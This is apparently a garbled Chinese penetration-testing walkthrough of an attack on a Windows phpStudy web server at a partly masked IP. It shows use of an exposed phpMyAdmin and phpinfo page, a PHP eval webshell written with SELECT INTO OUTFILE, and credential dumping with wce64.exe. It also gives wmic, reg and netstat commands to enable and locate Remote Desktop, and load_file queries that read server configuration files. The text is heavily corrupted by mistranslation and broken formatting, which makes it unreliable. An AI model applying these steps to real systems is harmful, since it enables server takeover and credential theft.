,西缅,shadonphpMyAdminindexOf
1 .
,,shadon
http://203.***.**.227/
http://203.***.**.227/www.********.hk.rar
http://203.***.**.227/phpMyAdmin/
http://203.***.**.227/新闻********元/
,phpinfo.phpphpMyAdminphpinfo。php1
1 2 .
,,2.37 GBconfig。2 notepadroot php
2
3根
3 .
,,phpinfo.phpCtrl + FSCRIPT_FILENAME_SERVER (“SCRIPT_FILENAME”),,,,,D:/WWW/phpinfo。php4
4. 4 mysqlwebshell
,,roothttp://203。* * *。* * .227 phpMyAdmin/5 sqlselect & lt; ?($ _POST[将]);php @ eval调用这些查找?祝辞到输出文件的d:/www/p。php的
5 mysql
6. 6网站管理权限
, http://203。* * *。* * .227http://203。* * *。* * .227/p。phpshell7webshell
7网站管理权限7。
,,,phpwce64。exewce64-w8
8
8.3389,,netstat——|发现“3389”tasklist/svctermservice tasklist/svc |找到“termService PID9ID1340
9 pid
,netstat -ano134010TCP7755netstat-ano |发现“1340”
10 9 .
,,mstsc.exe3389203。* * *。* *。227:775511
11 10。
,,http://www.yougetsignal.com/tools/web-sites-on-web-server/IP203。* * *。* * .22712IP13
12
131
11。
,13389年phpMyAdminwebshell
netstat -an | find "3389",3389
tasklist /svc | find "TermService" TermServicePID
netstat -ano | find "1340",2 windows2008server3389 PIDTCP
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
3 wce64 - w
4 phpinfoscript_filename 5 phpmyadmin
选择“& lt; ?($ _POST[将]);php @ eval调用这些查找?祝辞到输出文件的d:/www/p。php的
6 phpStudy
select load_file('D:\phpStudy\Lighttpd\conf\vhost.conf');
select load_file('D:\phpStudy\Lighttpd\conf\Lighttpd.conf');
select load_file('D:\phpStudy\Apache\conf\vhosts.conf');
select load_file('D:\phpStudy\Apache\conf\httpd.conf');
selectload_file (c: \ ini);
selectload_file (c: \ ini);
select load_file('D:\phpStudy\MySQL\my.ini');